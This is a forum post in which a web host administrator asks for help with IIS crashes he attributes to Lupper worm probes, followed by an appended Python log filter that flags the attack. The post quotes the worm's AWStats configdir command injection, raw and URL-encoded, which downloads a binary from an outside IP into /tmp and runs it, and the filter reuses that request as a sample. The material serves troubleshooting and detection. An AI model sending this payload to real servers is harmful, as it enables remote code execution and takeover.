Lupper worm taking down IIS?
From reading around material previously posted in this forum, I think we're having a problem with the Lupper worm. The IIS service on one of our web servers is repeatedly crashing with symptoms similar to those previously described by ChadM appearing in the stats:
The command it runs is:
|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|
It is passed to awstats.pl in a request like:
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1
Code:
The script started from the URL '/blog/xmlsrv/xmlrpc.php' with parameters '' has not responded within the configured timeout period.
However, Lupper is a Linux worm, so I rather doubt that the problem is we're actually infected with it. Furthermore, we've run four different virus scans on the machine and found nothing of particular relevance to this issue (a few infected user mailboxes, that's about it). Nonetheless, we're getting hammered by what appears to be symptoms of a virus that shouldn't be able to infect us, and I'm running out of ideas for what we can do.
My working theory is that what's happening is that infected machines are trying to infect us, are failing, but achieving a de facto DoS on our web service. We have both PHP (4.2.3) and Perl installed on the server, but from reading around, it seems that the exploit is within particular individual scripts, not those services themselves, and in any instance, I've read no reports of Windows servers running those services being affected. Can it really just be as simple as trashing PHP and Perl until the storm dies down? I really don't like to do that, but I'm running out of options.
Can anyone offer suggestions, explanation or possible resolutions? We have a couple of hundred sites hosted on that server, and this is becoming a really serious problem. TIA,
Simon
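An added example, not part of Simon's post or of any AWStats code: a small Python log filter that URL-decodes request lines like the one quoted above and flags the awstats.pl `configdir=` command-injection pattern, so the attempts can be counted, alerted on, or blocked at a proxy or IDS instead of each one tying up a CGI worker until IIS times out. The function names are hypothetical and the sample request lines are constructed; the first of them is the encoded request from the post.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Shell metacharacters that have no business in an AWStats config value. A
# value starting or ending with '|' is the two-argument Perl open() pipe trick
# the worm relies on.
SHELL_META = re.compile(r"[|;`$<>]")
CGI_TARGETS = ("awstats.pl",)


def decode_query(query):
    """Split a raw query string into (name, decoded value) pairs.
    Done by hand rather than with parse_qs so ';' stays inside the value."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_request(request_line):
    """Return a finding dict for an awstats command-injection attempt, else None.
    request_line looks like 'GET /cgi-bin/awstats.pl?configdir=... HTTP/1.1'."""
    fields = request_line.split(" ", 2)
    if len(fields) < 2:
        return None
    method, target = fields[0], fields[1]
    parts = urlsplit(target)
    if not parts.path.endswith(CGI_TARGETS):
        return None
    for name, value in decode_query(parts.query):
        if name in ("configdir", "config") and SHELL_META.search(value):
            return {"method": method, "path": parts.path,
                    "param": name, "payload": value}
    return None


def scan_log(lines):
    """Run classify_request over request lines; returns the list of findings."""
    return [f for f in (classify_request(l) for l in lines) if f]


# Constructed sample request lines (not from a real server log); the first is the
# encoded request quoted in the post, the others are ordinary traffic.
SAMPLE_LOG = [
    "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1",
    "GET /cgi-bin/awstats.pl?config=example.com&output=main HTTP/1.1",
    "GET /blog/xmlsrv/xmlrpc.php HTTP/1.1",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"blocked {hit['method']} {hit['path']} {hit['param']}={hit['payload']!r}")
```

On the sample above only the first line is reported, decoded to the exact `|echo;...;echo|` command ChadM quoted, which makes it easy to confirm that a block or alert rule is matching the right thing.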